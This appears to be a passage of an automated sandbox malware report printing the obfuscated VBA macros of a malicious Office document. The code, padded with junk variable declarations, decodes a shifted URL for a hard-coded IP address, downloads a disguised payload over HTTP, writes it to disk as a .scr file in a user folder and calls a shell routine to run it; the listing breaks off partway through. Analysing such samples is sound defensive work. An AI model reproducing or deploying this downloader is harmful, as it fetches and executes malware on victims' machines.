                    Part of subcall function sh1@ThisDocument: W4t1q

                    Part of subcall function sh1@ThisDocument: K1jv6

                    Part of subcall function sh1@ThisDocument: W10rU

                    Part of subcall function sh1@ThisDocument: WK0I3

                    Part of subcall function sh1@ThisDocument: Shell

                    Part of subcall function sh1@ThisDocument: Yi5qQ

                    Part of subcall function sh1@ThisDocument: Td518

                    Part of subcall function sh1@ThisDocument: G4mfw

                    G0d64

                    W362Y

                    GjaAA

                    StringsDecrypted Strings
                    "P3Wdq"
                    "Q13rR"
                    "Qjod7"
                    "Z65y7"
                    "Ph5Xn"
                    "kwws=2264147;154<14962lpdjhv2orjr51sqj"
                    "PGNG2"
                    "Um550"
                    "P8VN5"
                    "HEV04"
                    "Fgnvk"
                    "EMy1m"
                    "J6DD5"
                    "AsukH"
                    "MqXa4"
                    "CA6bX"
                    LineInstructionMeta Information
                    2

                    Sub x(H3450 as String)

                    3

                    Dim Wcw23 as Long

                    executed
                    4

                    Wcw23 = (902 + 159) / 43

                    5

                    Dim Vplft(6 To 253) as Long

                    6

                    Vplft(6) = (- 110 + 845) + 33

                    7

                    Dim E5j8d as Long

                    8

                    E5j8d = (- 602 - 950) - 18

                    9

                    Dim KKDAG(84) as Byte

                    10

                    KKDAG(84) = 140

                    11

                    Dim JPF2q as String

                    12

                    JPF2q = "P3Wdq"

                    13

                    Dim UrUg6 as String

                    14

                    UrUg6 = "Q13rR"

                    15

                    Dim Qg0lj(3 To 311) as Long

                    16

                    Qg0lj(3) = (- 528 + 259) + 4

                    17

                    Dim Vy87F(7 To 248) as String

                    18

                    Vy87F(7) = Ik728

                    Ik728

                    19

                    Dim X02ob as Byte

                    20

                    X02ob = 111

                    21

                    Dim Lgqf0(84) as Byte

                    22

                    Lgqf0(84) = 138

                    23

                    Dim Ej4Ik(44) as Byte

                    24

                    Ej4Ik(44) = 186

                    25

                    Dim Ltz67 as String

                    26

                    Ltz67 = "Qjod7"

                    27

                    Dim N36ch as Long

                    28

                    N36ch = (- 487 + 918) + 46

                    29

                    Dim F1YcV as Byte

                    30

                    F1YcV = 234

                    31

                    Dim J5Unu(21) as Byte

                    32

                    J5Unu(21) = 116

                    33

                    Dim Z1Q05 as Long

                    34

                    Z1Q05 = (- 385 / 711) - 36

                    35

                    Dim No560 as Byte

                    36

                    No560 = 104

                    37

                    Dim Gardq(14 To 44) as String

                    38

                    Gardq(14) = A014z

                    A014z

                    39

                    Dim Mj865 as Long

                    40

                    Mj865 = (565 / 173) + 19

                    41

                    Dim E38D5(13 To 76) as Long

                    42

                    E38D5(13) = (803 + 826) + 29

                    43

                    Dim H25p8(14 To 339) as String

                    44

                    H25p8(14) = "Z65y7"

                    45

                    Dim Yx77T(14 To 478) as String

                    46

                    Yx77T(14) = "Ph5Xn"

                    47

                    Dim YRnH6(24 To 499) as String

                    48

                    YRnH6(24) = UrERz

                    UrERz

                    49

                    Dim BO5Ll(25 To 250) as Long

                    50

                    BO5Ll(25) = (- 317 + 385) + 42

                    51

                    Dim DkZQe(83) as Byte

                    52

                    DkZQe(83) = 193

                    53

                    Dim In0TS(56) as Byte

                    54

                    In0TS(56) = 113

                    55

                    Dim W4sB8(9 To 436) as Long

                    56

                    W4sB8(9) = (- 573 / 409) - 20

                    57

                    U5P6J = 3

                    58

                    Dim Np0lB as Byte

                    59

                    Dim SM03Q(96) as Byte

                    60

                    SM03Q(96) = 48

                    61

                    OG3wL = BjOEsxO3("kwws=2264147;154<14962lpdjhv2orjr51sqj", 3)

                    62

                    Dim W08oB(4 To 498) as String

                    63

                    W08oB(4) = YcIPR

                    YcIPR

                    64

                    Dim A17Ss(3 To 131) as String

                    65

                    A17Ss(3) = MRbO5

                    MRbO5

                    66

                    JqQxS = I8BD2(CStr(OG3wL), H3450)

                    CStr

                    67

                    Dim HWXvn(1) as Byte

                    68

                    HWXvn(1) = 193

                    69

                    Dim XpDX4(12 To 164) as String

                    70

                    XpDX4(12) = "PGNG2"

                    71

                    Dim S56Ei(2 To 137) as String

                    72

                    S56Ei(2) = NIuZE

                    NIuZE

                    73

                    Dim XH8ys as String

                    74

                    XH8ys = "Um550"

                    75

                    Dim D3771 as String

                    76

                    D3771 = EP2DB

                    EP2DB

                    77

                    Set H8sz2 = New LKfy2

                    78

                    Dim Phi5G(10 To 487) as Long

                    79

                    Phi5G(10) = (604 / 938) + 35

                    80

                    Dim DCU0D as String

                    81

                    DCU0D = "P8VN5"

                    82

                    Dim Pzq8I as String

                    83

                    Pzq8I = ZvDa2

                    ZvDa2

                    84

                    Dim ASlRX as String

                    85

                    ASlRX = "HEV04"

                    86

                    Dim R4HT8 as String

                    87

                    R4HT8 = "Fgnvk"

                    88

                    Dim H05yl(23 To 116) as String

                    89

                    H05yl(23) = "EMy1m"

                    90

                    Call H8sz2.test1(JqQxS, H3450)

                    91

                    Dim RdOLo as Byte

                    92

                    Dim GZbj1(10 To 246) as Long

                    93

                    GZbj1(10) = (- 373 - 474) + 14

                    94

                    Dim DrBDn as String

                    95

                    DrBDn = "J6DD5"

                    96

                    Dim FvrWP(28 To 88) as Long

                    97

                    FvrWP(28) = (823 / 524) / 27

                    98

                    Dim G6sS1(92) as Byte

                    99

                    G6sS1(92) = 19

                    100

                    Dim QN2gr as Long

                    101

                    QN2gr = (784 - 717) / 14

                    102

                    Dim E6t54(76) as Byte

                    103

                    E6t54(76) = 232

                    104

                    Dim RAYYk as String

                    105

                    RAYYk = "AsukH"

                    106

                    Dim MPbFq(66) as Byte

                    107

                    MPbFq(66) = 80

                    108

                    Call H8sz2.sh1(H3450)

                    109

                    Dim UqrUz(16 To 316) as Long

                    110

                    UqrUz(16) = (305 - 894) + 49

                    111

                    Dim G153l(6 To 118) as String

                    112

                    G153l(6) = G0d64

                    G0d64

                    113

                    Dim JdUVu(29) as Byte

                    114

                    JdUVu(29) = 29

                    115

                    Dim G61y7 as Byte

                    116

                    G61y7 = 79

                    117

                    Dim E1886(18 To 265) as Long

                    118

                    E1886(18) = (- 376 - 619) - 2

                    119

                    Dim Y8OAf(28) as Byte

                    120

                    Y8OAf(28) = 166

                    121

                    Dim R1Sfd as Long

                    122

                    R1Sfd = (- 690 - 587) + 12

                    123

                    Dim L1SPN(58) as Byte

                    124

                    L1SPN(58) = 35

                    125

                    Dim CN0Hv(24 To 25) as Long

                    126

                    CN0Hv(24) = (588 - 519) - 12

                    127

                    Dim Bn7IT(12 To 248) as String

                    128

                    Bn7IT(12) = "MqXa4"

                    129

                    Dim Z616Y(58) as Byte

                    130

                    Z616Y(58) = 27

                    131

                    Dim BUaTF(6 To 252) as String

                    132

                    BUaTF(6) = W362Y

                    W362Y

                    133

                    Dim D3r3M as Long

                    134

                    D3r3M = (- 750 / 201) - 33

                    135

                    Dim RiA0L as Byte

                    136

                    RiA0L = 23

                    137

                    Dim R56lI as String

                    138

                    R56lI = "CA6bX"

                    139

                    Dim Snt77 as Byte

                    140

                    Dim IwL03(8 To 123) as String

                    141

                    IwL03(8) = GjaAA

                    GjaAA

                    142

                    Dim Zu23C as Long

                    143

                    Zu23C = (- 184 - 544) + 44

                    144

                    End Sub

                    Module: JtuJu

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "JtuJu"

                    Executed Functions
                    Function I8BD2, APIs: 23, Strings: 24, Number of lines: 232, Relevance: 104.232
                    APIsMeta Information

                    VKsr5

                    VFDa2

                    QGdom

                    TO8KM

                    H87Y8

                    XPcZ8

                    Wt628

                    Open

                    		IServerXMLHTTPRequest2.Open("GET","http://31.148.219.163/images/logo2.png",False)

                    Lyu7w

                    YT4R3

                    ECehc

                    CTt54

                    send

                    IO4H1

                    DMpT6

                    V6si1

                    WlH6E

                    JNo8v

                    D7Hyo

                    responseBody

                    FuUpS

                    G065k

                    FG3dN

                    StringsDecrypted Strings
                    "DD4qR"
                    "QdrWc"
                    "GET"
                    "Rt6r5"
                    "U06mm"
                    "G3mne"
                    "VGe22"
                    "F4gH0"
                    "G6Kaw"
                    "ELc2n"
                    "MND87"
                    "BMf14"
                    "ZhWm1"
                    "BVsV7"
                    "UoI88"
                    "Gta02"
                    "DHrmI"
                    "KkZbP"
                    "InRz7"
                    "MTXLz"
                    "Eywfs"
                    "Tylh3"
                    "Ih5PG"
                    "GmIPI"
                    LineInstructionMeta Information
                    2

                    Public Function I8BD2(HT73f as String, LuU0P as String)

                    3

                    Dim U5grB as Byte

                    executed
                    4

                    Dim BZ5kz(47) as Byte

                    5

                    BZ5kz(47) = 223

                    6

                    Dim I18Kb as String

                    7

                    I18Kb = "DD4qR"

                    8

                    Dim Cy6v7 as String

                    9

                    Cy6v7 = VKsr5

                    VKsr5

                    10

                    Dim FI3dl as Long

                    11

                    FI3dl = (516 - 230) - 18

                    12

                    Dim Hky13 as Byte

                    13

                    Dim IdLrH as Long

                    14

                    IdLrH = (- 25 / 456) + 31

                    15

                    Dim Qngb3(16) as Byte

                    16

                    Qngb3(16) = 145

                    17

                    Dim JB0z2 as Byte

                    18

                    Dim LS5OD as Byte

                    19

                    Dim Pf784 as String

                    20

                    Pf784 = VFDa2

                    VFDa2

                    21

                    Dim Gh0Hi(7 To 13) as String

                    22

                    Gh0Hi(7) = QGdom

                    QGdom

                    23

                    Dim MieO2 as Byte

                    24

                    Dim JYMxd as Byte

                    25

                    JYMxd = 201

                    26

                    Dim OF46X as Byte

                    27

                    OF46X = 23

                    28

                    Dim D6G21(17 To 442) as String

                    29

                    D6G21(17) = TO8KM

                    TO8KM

                    30

                    Dim WtOn1 as Long

                    31

                    WtOn1 = (527 + 736) + 1

                    32

                    Dim FF6H5(31) as Byte

                    33

                    FF6H5(31) = 11

                    34

                    Dim Bu6X2(92) as Byte

                    35

                    Bu6X2(92) = 242

                    36

                    Dim SU7bX as Byte

                    37

                    SU7bX = 14

                    38

                    Dim XK2JW as Byte

                    39

                    XK2JW = 171

                    40

                    Dim HI6ZS as Byte

                    41

                    Dim SNu2g as Long

                    42

                    SNu2g = (499 - 716) / 14

                    43

                    Dim YLL53(16) as Byte

                    44

                    YLL53(16) = 64

                    45

                    Dim FFiqz(24) as Byte

                    46

                    FFiqz(24) = 167

                    47

                    Dim QWbb8 as Long

                    48

                    QWbb8 = (- 631 - 525) + 28

                    49

                    Dim LSprl as Byte

                    50

                    Dim VTNzR(35) as Byte

                    51

                    VTNzR(35) = 171

                    52

                    Set NjL7i = New MSXML2.XMLHTTP60

                    53

                    Dim JjohY as Long

                    54

                    JjohY = (- 208 / 955) / 19

                    55

                    Dim Ii2q5(29) as Byte

                    56

                    Ii2q5(29) = 168

                    57

                    Dim J02ms(33 To 183) as String

                    58

                    J02ms(33) = H87Y8

                    H87Y8

                    59

                    Dim JRCMV as Byte

                    60

                    Dim LJRn2 as String

                    61

                    LJRn2 = XPcZ8

                    XPcZ8

                    62

                    Dim Y7r6A as Long

                    63

                    Y7r6A = (120 - 526) / 32

                    64

                    Dim A8y3O as String

                    65

                    A8y3O = Wt628

                    Wt628

                    66

                    Dim VPlmH as Long

                    67

                    VPlmH = (- 836 - 272) - 46

                    68

                    Dim N4Yxi as String

                    69

                    N4Yxi = "QdrWc"

                    70

                    Dim BD3cq as Byte

                    71

                    Dim PIs8w as Long

                    72

                    PIs8w = (- 500 / 156) / 38

                    73

                    Dim N7HlY as Long

                    74

                    N7HlY = (749 + 930) + 20

                    75

                    Dim Zn5aV(23 To 108) as Long

                    76

                    Zn5aV(23) = (- 173 + 224) - 36

                    77

                    NjL7i.Open "GET", HT73f, False

                    IServerXMLHTTPRequest2.Open("GET","http://31.148.219.163/images/logo2.png",False)

                    executed
                    78

                    Dim Nc6qJ as String

                    79

                    Nc6qJ = "Rt6r5"

                    80

                    Dim D3Ic2 as String

                    81

                    D3Ic2 = Lyu7w

                    Lyu7w

                    82

                    Dim UZ3ZO as Byte

                    83

                    Dim HFxF6(40) as Byte

                    84

                    HFxF6(40) = 48

                    85

                    Dim K81yo(14 To 498) as String

                    86

                    K81yo(14) = YT4R3

                    YT4R3

                    87

                    Dim SjZ35(71) as Byte

                    88

                    SjZ35(71) = 239

                    89

                    Dim BSofa as Byte

                    90

                    Dim C3G0E as Byte

                    91

                    Dim EiLn6 as Byte

                    92

                    EiLn6 = 248

                    93

                    Dim S42Zq(12 To 249) as String

                    94

                    S42Zq(12) = "U06mm"

                    95

                    Dim MPPFQ as Long

                    96

                    MPPFQ = (425 + 422) + 21

                    97

                    Dim CRaOL(7) as Byte

                    98

                    CRaOL(7) = 76

                    99

                    Dim YH7u0 as Byte

                    100

                    YH7u0 = 174

                    101

                    Dim ACblY as Long

                    102

                    ACblY = (223 - 137) / 9

                    103

                    Dim RJQIq(22 To 353) as Long

                    104

                    RJQIq(22) = (- 338 / 233) + 48

                    105

                    Dim ChFnV as String

                    106

                    ChFnV = ECehc

                    ECehc

                    107

                    Dim L35r0(22 To 373) as String

                    108

                    L35r0(22) = "G3mne"

                    109

                    Dim Byj44 as Byte

                    110

                    Byj44 = 63

                    111

                    Dim VNJM6(31 To 98) as String

                    112

                    VNJM6(31) = CTt54

                    CTt54

                    113

                    Dim SRHtH(1 To 284) as Long

                    114

                    SRHtH(1) = (- 276 + 526) / 16

                    115

                    Dim ZyRzJ as String

                    116

                    ZyRzJ = "VGe22"

                    117

                    Dim RRyRA as String

                    118

                    RRyRA = "F4gH0"

                    119

                    Dim J2OM5(8 To 488) as String

                    120

                    J2OM5(8) = "G6Kaw"

                    121

                    Dim ApYPS as String

                    122

                    ApYPS = "ELc2n"

                    123

                    Dim Az3p7(3 To 103) as String

                    124

                    Az3p7(3) = "MND87"

                    125

                    Dim EZ1ZV(66) as Byte

                    126

                    EZ1ZV(66) = 76

                    127

                    Dim Af13k as Long

                    128

                    Af13k = (- 295 + 951) - 12

                    129

                    Dim R51Vs(27 To 65) as Long

                    130

                    R51Vs(27) = (- 308 - 382) - 34

                    131

                    NjL7i.send

                    send

                    132

                    Dim PNT74(45) as Byte

                    133

                    PNT74(45) = 97

                    134

                    Dim Q2615 as String

                    135

                    Q2615 = "BMf14"

                    136

                    Dim K44qS as Long

                    137

                    K44qS = (342 / 470) + 13

                    138

                    Dim BAhW5(52) as Byte

                    139

                    BAhW5(52) = 21

                    140

                    Dim Jj1W5(5 To 73) as Long

                    141

                    Jj1W5(5) = (- 438 / 935) - 9

                    142

                    Dim Rr5Bg(16 To 423) as String

                    143

                    Rr5Bg(16) = "ZhWm1"

                    144

                    Dim Mxq43(99) as Byte

                    145

                    Mxq43(99) = 19

                    146

                    Dim L8edw as String

                    147

                    L8edw = "BVsV7"

                    148

                    Dim Y2Eo8 as Byte

                    149

                    Y2Eo8 = 83

                    150

                    Dim SQ1x7 as Long

                    151

                    SQ1x7 = (- 329 + 735) + 46

                    152

                    Dim Chd6y(20 To 59) as Long

                    153

                    Chd6y(20) = (- 378 / 840) - 20

                    154

                    Dim VUpu6(18 To 238) as Long

                    155

                    VUpu6(18) = (581 + 854) / 3

                    156

                    Dim Tl0JN as Byte

                    157

                    Tl0JN = 135

                    158

                    Dim PinNp(30 To 173) as String

                    159

                    PinNp(30) = "UoI88"

                    160

                    Dim S40aq as String

                    161

                    S40aq = "Gta02"

                    162

                    Dim B3fX6(20 To 441) as Long

                    163

                    B3fX6(20) = (972 - 891) + 13

                    164

                    Dim HWO4Q as String

                    165

                    HWO4Q = "DHrmI"

                    166

                    Dim Vqs00(22 To 338) as String

                    167

                    Vqs00(22) = IO4H1

                    IO4H1

                    168

                    Dim YA1t2 as String

                    169

                    YA1t2 = "KkZbP"

                    170

                    Dim P3FE7 as String

                    171

                    P3FE7 = DMpT6

                    DMpT6

                    172

                    Dim OG7w8(26 To 272) as String

                    173

                    OG7w8(26) = V6si1

                    V6si1

                    174

                    Dim U0JxK(97) as Byte

                    175

                    U0JxK(97) = 240

                    176

                    Dim Un55J as Long

                    177

                    Un55J = (- 102 / 376) - 26

                    178

                    Dim J88mQ(27 To 101) as String

                    179

                    J88mQ(27) = WlH6E

                    WlH6E

                    180

                    Dim KcQt7(30 To 398) as String

                    181

                    KcQt7(30) = "InRz7"

                    182

                    Dim ZnrB1(27 To 492) as Long

                    183

                    ZnrB1(27) = (- 645 / 403) / 49

                    184

                    Dim O4wI8 as String

                    185

                    O4wI8 = JNo8v

                    JNo8v

                    186

                    Dim YERsH as String

                    187

                    YERsH = D7Hyo

                    D7Hyo

                    188

                    Dim Xlis1(6 To 91) as Long

                    189

                    Xlis1(6) = (868 + 851) + 10

                    190

                    OyTW4 = NjL7i.responseBody

                    responseBody

                    191

                    Dim M5tx8(21 To 317) as String

                    192

                    M5tx8(21) = "MTXLz"

                    193

                    Dim WSeKK as String

                    194

                    WSeKK = FuUpS

                    FuUpS

                    195

                    Dim RZyw2(40) as Byte

                    196

                    RZyw2(40) = 81

                    197

                    Dim FfRhl as String

                    198

                    FfRhl = G065k

                    G065k

                    199

                    I8BD2 = OyTW4

                    200

                    Dim Ntfxk as Long

                    201

                    Ntfxk = (- 66 - 109) + 26

                    202

                    Dim EMnFI as String

                    203

                    EMnFI = "Eywfs"

                    204

                    Dim YcD6N(73) as Byte

                    205

                    YcD6N(73) = 10

                    206

                    Dim MbC11 as String

                    207

                    MbC11 = "Tylh3"

                    208

                    Dim C0G6z(26 To 229) as String

                    209

                    C0G6z(26) = FG3dN

                    FG3dN

                    210

                    Dim RgWK0(28) as Byte

                    211

                    RgWK0(28) = 129

                    212

                    Dim S35Y4 as Long

                    213

                    S35Y4 = (- 651 + 301) / 27

                    214

                    Dim XY43o(8 To 228) as Long

                    215

                    XY43o(8) = (- 905 + 335) / 32

                    216

                    Dim O1x15(22) as Byte

                    217

                    O1x15(22) = 64

                    218

                    Dim M3R3w as Byte

                    219

                    Dim R3QFe(6) as Byte

                    220

                    R3QFe(6) = 30

                    221

                    Dim A78vE as Byte

                    222

                    A78vE = 126

                    223

                    Dim B664h as Long

                    224

                    B664h = (18 + 538) / 27

                    225

                    Dim QH55r as String

                    226

                    QH55r = "Ih5PG"

                    227

                    Dim B8i78 as Long

                    228

                    B8i78 = (- 843 + 422) - 18

                    229

                    Dim JvV5U(46) as Byte

                    230

                    JvV5U(46) = 226

                    231

                    Dim RkMj1 as String

                    232

                    RkMj1 = "GmIPI"

                    233

                    End Function

                    Module: LKfy2

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "LKfy2"

                    2

                    Attribute VB_Base = "0{0917F18E-9EE5-4716-82FB-F3C380FC94B1}{ECD25D7D-BA7A-4CC7-A896-BAC7A9D141C6}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = False

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = False

                    Executed Functions
                    Subroutine test1, APIs: 48, Strings: 32, Number of lines: 439, Relevance: 142.189
                    APIsMeta Information

                    W6GKF

                    Xbh0h

                    ZGVT4

                    S8SxT

                    IZy5i

                    Jm1cs

                    ZOaK2

                    R3bh6

                    R828O

                    UrlR1

                    Ac5W6

                    Jzed2

                    WHhbG

                    L50h6

                    SbxRg

                    UBound

                    SgThF

                    L4k6Z

                    AJQF4

                    DQZ20

                    Ft8Bk

                    UBound

                    Eb3be

                    SYbzA

                    B4bP1

                    I2sZr

                    VvZ0F

                    QKBEp

                    RdHtR

                    X5D63

                    Open

                    		Open("C:\Users\luketaylor\text.doc.16147.scr")

                    ZdOQk

                    DW7qw

                    AC4wm

                    SkX5n

                    K6Lww

                    J7ie0

                    Ic1Eh

                    DEOo8

                    M0huq

                    E40L2

                    DBJaS

                    Hf724

                    LGvtQ

                    OkaWA

                    JrPYW

                    F6kH3

                    Hf7hK

                    StringsDecrypted Strings
                    "DzVR8"
                    "W6v4x"
                    "CY3m7"
                    "R452k"
                    "GOUC2"
                    "OXkdT"
                    "T10VB"
                    "Y7745"
                    "GzOjv"
                    "UmDpA"
                    "YB32w"
                    "Dw75W"
                    "PhHn0"
                    "V8qkI"
                    "J8IL7"
                    "DD0qd"
                    "Iundr"
                    "QXHK6"
                    "YK22i"
                    "XuidR"
                    "X6wh0"
                    "EHw60"
                    "M88Xk"
                    "LMP6t"
                    "PA7En"
                    "JmTzx"
                    "Zo6UE"
                    "OvD2n"
                    "BNFSv"
                    "OJ4L1"
                    "Vs33Z"
                    "JqSOJ"
                    LineInstructionMeta Information
                    9

                    Public Sub test1(FW5Vg, Oj62U)

                    10

                    Dim HMDxF as Long

                    executed
                    11

                    HMDxF = (381 / 353) / 30

                    12

                    Dim UbUB4 as Byte

                    13

                    UbUB4 = 137

                    14

                    Dim Ih7m7 as Long

                    15

                    Ih7m7 = (619 + 960) / 6

                    16

                    Dim ZGxe7 as String

                    17

                    ZGxe7 = "DzVR8"

                    18

                    Dim KsIBn(31 To 213) as String

                    19

                    KsIBn(31) = W6GKF

                    W6GKF

                    20

                    Dim WSn2h(27 To 32) as String

                    21

                    WSn2h(27) = Xbh0h

                    Xbh0h

                    22

                    Dim NjUS4 as Byte

                    23

                    Dim DeD6w as Long

                    24

                    DeD6w = (567 / 165) - 46

                    25

                    Dim Lt5qg(95) as Byte

                    26

                    Lt5qg(95) = 197

                    27

                    Dim P6p0K as Byte

                    28

                    Dim JgRHa(88) as Byte

                    29

                    JgRHa(88) = 174

                    30

                    Dim AB3T3 as Long

                    31

                    AB3T3 = (- 35 + 980) + 48

                    32

                    Dim QOhqa(21 To 327) as String

                    33

                    QOhqa(21) = ZGVT4

                    ZGVT4

                    34

                    Dim Vl18Z as Long

                    35

                    Vl18Z = (395 - 767) + 28

                    36

                    Dim SBC3y(13 To 237) as Long

                    37

                    SBC3y(13) = (588 / 887) + 38

                    38

                    Dim PhO70 as Byte

                    39

                    PhO70 = 17

                    40

                    Dim TEe28 as Long

                    41

                    TEe28 = (528 - 713) / 45

                    42

                    Dim Emnh5(28 To 342) as Long

                    43

                    Emnh5(28) = (- 322 + 695) + 4

                    44

                    Dim Jn7t4 as String

                    45

                    Jn7t4 = S8SxT

                    S8SxT

                    46

                    Dim Ag7HR as Byte

                    47

                    Ag7HR = 247

                    48

                    Dim D11C8(79) as Byte

                    49

                    D11C8(79) = 159

                    50

                    Dim KrjXB as String

                    51

                    KrjXB = IZy5i

                    IZy5i

                    52

                    Dim HHYU8(99) as Byte

                    53

                    HHYU8(99) = 88

                    54

                    Dim D60Tw(23 To 237) as Long

                    55

                    D60Tw(23) = (- 371 / 438) + 48

                    56

                    Dim QRXmn(57) as Byte

                    57

                    QRXmn(57) = 165

                    58

                    Dim O42h2(90) as Byte

                    59

                    O42h2(90) = 13

                    60

                    Dim Ha1Oz as Byte

                    61

                    Dim GFRR5(7 To 493) as Long

                    62

                    GFRR5(7) = (949 + 872) / 23

                    63

                    Dim Cw05K(44) as Byte

                    64

                    Cw05K(44) = 62

                    65

                    Dim FkN4O as Long

                    66

                    FkN4O = (342 + 529) / 43

                    67

                    Dim Gu8Xe() as Byte

                    68

                    Dim YVJIa(1 To 100) as String

                    69

                    YVJIa(1) = "W6v4x"

                    70

                    Dim J1GIt(12 To 196) as String

                    71

                    J1GIt(12) = "CY3m7"

                    72

                    Dim RBnS3(27 To 62) as Long

                    73

                    RBnS3(27) = (61 + 535) + 2

                    74

                    Dim CHr22 as String

                    75

                    CHr22 = "R452k"

                    76

                    Dim MXWMF as String

                    77

                    MXWMF = Jm1cs

                    Jm1cs

                    78

                    Dim VC8p1 as Byte

                    79

                    Dim Zz0vc as String

                    80

                    Zz0vc = ZOaK2

                    ZOaK2

                    81

                    Dim I07BM as Byte

                    82

                    I07BM = 23

                    83

                    Dim C5VD1(8) as Byte

                    84

                    C5VD1(8) = 160

                    85

                    Dim V203p as Long

                    86

                    V203p = (973 - 135) / 21

                    87

                    Dim GwNDK(0 To 1) as Long

                    88

                    GwNDK(0) = (961 / 78) + 41

                    89

                    Dim Ez2bF as Byte

                    90

                    Dim Q8D6s(16 To 384) as String

                    91

                    Q8D6s(16) = R3bh6

                    R3bh6

                    92

                    With CreateObject("adodb.stream")

                    93

                    Dim NEZVw as String

                    94

                    NEZVw = R828O

                    R828O

                    95

                    Dim J43u7 as Long

                    96

                    J43u7 = (- 384 - 743) / 43

                    97

                    Dim T5s85 as Byte

                    98

                    Dim SX1Vo as Long

                    99

                    SX1Vo = (- 431 / 148) + 3

                    100

                    Dim AItjD(7 To 334) as String

                    101

                    AItjD(7) = "GOUC2"

                    102

                    Dim H8U51(10 To 433) as String

                    103

                    H8U51(10) = "OXkdT"

                    104

                    Dim F7SOQ(18 To 489) as Long

                    105

                    F7SOQ(18) = (126 / 963) / 32

                    106

                    Dim B1ptR(92) as Byte

                    107

                    B1ptR(92) = 254

                    108

                    Dim B1E7i as Long

                    109

                    B1E7i = (- 451 + 601) - 3

                    110

                    Dim LuC6X(27 To 180) as String

                    111

                    LuC6X(27) = "T10VB"

                    112

                    Dim Inz8x(25 To 73) as Long

                    113

                    Inz8x(25) = (460 + 21) / 11

                    114

                    Dim Dykvf as Byte

                    115

                    Dim UsEEv as Byte

                    116

                    Dim J3IU5 as String

                    117

                    J3IU5 = UrlR1

                    UrlR1

                    118

                    Dim FJCT0 as String

                    119

                    FJCT0 = Ac5W6

                    Ac5W6

                    120

                    Dim TbR8V(1 To 147) as String

                    121

                    TbR8V(1) = "Y7745"

                    122

                    Dim EHPw0(15 To 212) as Long

                    123

                    EHPw0(15) = (- 341 - 426) / 20

                    124

                    Dim DVnJi(27 To 477) as String

                    125

                    DVnJi(27) = "GzOjv"

                    126

                    Dim NW6p8 as Byte

                    127

                    Dim D6h37 as Byte

                    128

                    Dim FwIFb(79) as Byte

                    129

                    FwIFb(79) = 119

                    130

                    Dim JA4xm as String

                    131

                    JA4xm = "UmDpA"

                    132

                    Dim T2V7i(21 To 68) as Long

                    133

                    T2V7i(21) = (684 / 734) - 13

                    134

                    Dim Gnay3(7 To 104) as Long

                    135

                    Gnay3(7) = (572 + 784) - 18

                    136

                    Dim W7K57 as Byte

                    137

                    Dim M3P4t as Long

                    138

                    M3P4t = (- 7 - 600) + 8

                    139

                    Dim EZD6g(46) as Byte

                    140

                    EZD6g(46) = 99

                    141

                    Dim E0ArF as Byte

                    142

                    Dim K0u3O(26 To 100) as Long

                    143

                    K0u3O(26) = (858 / 645) + 16

                    144

                    Dim JAt20(26) as Byte

                    145

                    JAt20(26) = 2

                    146

                    Dim GH7R6(11) as Byte

                    147

                    GH7R6(11) = 100

                    148

                    Dim Q1Z8R(80) as Byte

                    149

                    Q1Z8R(80) = 38

                    150

                    Dim S8f8P as Long

                    151

                    S8f8P = (633 - 582) - 27

                    152

                    Dim QDpZG as Long

                    153

                    QDpZG = (- 383 + 777) / 49

                    154

                    Dim I3cWu as Byte

                    155

                    I3cWu = 228

                    156

                    Dim D60h2 as Byte

                    157

                    D60h2 = 254

                    158

                    Dim R4246 as Byte

                    159

                    Dim ByhT5(9 To 255) as Long

                    160

                    ByhT5(9) = (- 309 + 243) - 8

                    161

                    . Type = 1

                    162

                    Dim M70t5(18 To 283) as Long

                    163

                    M70t5(18) = (- 363 / 874) + 8

                    164

                    Dim QcItR as Byte

                    165

                    QcItR = 82

                    166

                    Dim PErd4(66) as Byte

                    167

                    PErd4(66) = 46

                    168

                    Dim RJD57(53) as Byte

                    169

                    RJD57(53) = 96

                    170

                    Dim UdLIC(3 To 256) as String

                    171

                    UdLIC(3) = Jzed2

                    Jzed2

                    172

                    Dim T0t5u(95) as Byte

                    173

                    T0t5u(95) = 61

                    174

                    Dim TE2BA as String

                    175

                    TE2BA = WHhbG

                    WHhbG

                    176

                    Dim A05tr as Long

                    177

                    A05tr = (87 - 563) - 1

                    178

                    Dim QVj2A(1 To 414) as String

                    179

                    QVj2A(1) = L50h6

                    L50h6

                    180

                    Dim FF0qk(17) as Byte

                    181

                    FF0qk(17) = 212

                    182

                    Dim J2Oo7(30 To 446) as String

                    183

                    J2Oo7(30) = "YB32w"

                    184

                    . Open

                    185

                    Dim F6e0j as Byte

                    186

                    F6e0j = 23

                    187

                    Dim VpzpC(42) as Byte

                    188

                    VpzpC(42) = 199

                    189

                    . Write FW5Vg

                    190

                    Dim URyPU(4 To 360) as Long

                    191

                    URyPU(4) = (418 / 242) / 45

                    192

                    Ez2bF = 169

                    193

                    Dim Lx3y2(0 To 1) as String

                    194

                    Lx3y2(0) = "Dw75W"

                    195

                    Dim PBnGN as String

                    196

                    PBnGN = "PhHn0"

                    197

                    Dim O0tFy(20 To 168) as Long

                    198

                    O0tFy(20) = (- 397 + 444) - 48

                    199

                    Dim LGp6q as Long

                    200

                    LGp6q = (984 / 460) / 11

                    201

                    Dim BV1ha as String

                    202

                    BV1ha = "V8qkI"

                    203

                    Dim WrA2d(15 To 252) as String

                    204

                    WrA2d(15) = SbxRg

                    SbxRg

                    205

                    Redim Gu8Xe(UBound(FW5Vg) + Ez2bF)

                    UBound

                    206

                    Dim OEP8X as Long

                    207

                    OEP8X = (- 499 / 36) + 18

                    208

                    Dim NCPvi as String

                    209

                    NCPvi = SgThF

                    SgThF

                    210

                    Dim Yrt6o as String

                    211

                    Yrt6o = "J8IL7"

                    212

                    Dim I6LL6(10 To 52) as String

                    213

                    I6LL6(10) = "DD0qd"

                    214

                    Dim JZMjI as Byte

                    215

                    JZMjI = 29

                    216

                    Dim QwoJ8 as String

                    217

                    QwoJ8 = "Iundr"

                    218

                    Dim MS04Q as Byte

                    219

                    MS04Q = 47

                    220

                    Dim KPnWw as Long

                    221

                    KPnWw = (- 728 - 812) - 37

                    222

                    Dim Bj6FC as String

                    223

                    Bj6FC = "QXHK6"

                    224

                    Dim UyUCU as Byte

                    225

                    Dim L88zU as Byte

                    226

                    L88zU = 113

                    227

                    Dim SpFgy(22) as Byte

                    228

